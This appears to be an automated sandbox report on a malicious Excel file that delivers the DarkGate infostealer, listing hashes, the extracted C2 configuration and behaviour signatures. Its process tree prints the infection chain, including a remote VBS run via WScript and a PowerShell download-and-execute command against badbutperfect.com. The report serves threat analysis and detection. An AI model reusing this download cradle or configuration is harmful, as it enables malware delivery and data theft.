Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
20/03/2024, 11:41
General
-
Target
march19-D1482-2024.xlsx
-
Size
56KB
-
MD5
58bd1ea09bb663ead5492e2a43b6fb77
-
SHA1
0a3d7f905e00973c05d51b60036838acab9d723b
-
SHA256
efb106418264f96ba251321a5c3ed8a191e3b8123f647d4ccf8c08d5447d03f6
-
SHA512
b82605a87c50e1d7d662e98ba2aeac1e540affddaec8628c8c491b194469a834d8bffd876a78ea6719e92f59e0e219f4f681a739e15ce381e63d9534ca43570a
-
SSDEEP
1536:Fkws9oLE3Ow6DyPgMUti9xx7bxNfI5ydaRLgIui3pqDyBROnlTP:FSoEOfEgMNdxI5yYhgu5zBRYr
Malware Config
Extracted
darkgate
admin888
badbutperfect.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
WZqqpfdY
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
DarkGate
DarkGate is an infostealer written in C++.
-
Detect DarkGate stealer 2 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\march19-D1482-2024.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\escuelademarina.com\cloud\AZURE_DOC_OPEN.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\rimz\AutoHotkey.exe"C:\rimz\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rimz4⤵
- Views/modifies file attributes
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4148 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
54KB
MD5f02f0bba1f1f678da41abafd02f4c545
SHA1c40b80bc4947d4ac52bc9c17d6d218b1fa9cd452
SHA2565aac7d31149048763e688878c3910ae4881826db80e078754f5d08f2c1f39572
SHA5128b56e388781a9fb855d8352f2cf175a7e0c5bb36bacd79be719ffa0c9f4c9f6e852bd460b6e9b0b7ea47ff38aa803e43a2366bf7a2686905c05bdd9e231b5b22
-
Filesize
915KB
MD54e1b052f107d2ee5321b44fc0e107638
SHA1679e1f8006a2d6ed61f0dbaf5e9d3cd252421cd4
SHA256a39dba6db04a85050ba7949881769f4b006b4a8edf691a605bfa5fe7c24d3489
SHA5125c4d1907ef2cbc894e8e33d268160a88e9db2d1a081676cba9d8fcfda4c120458a2ed90d44b2963accc842b03fac9bf231145d5991899bf6ab4871d9b65c2cb1
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
1.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
460KB
-
Filesize
460KB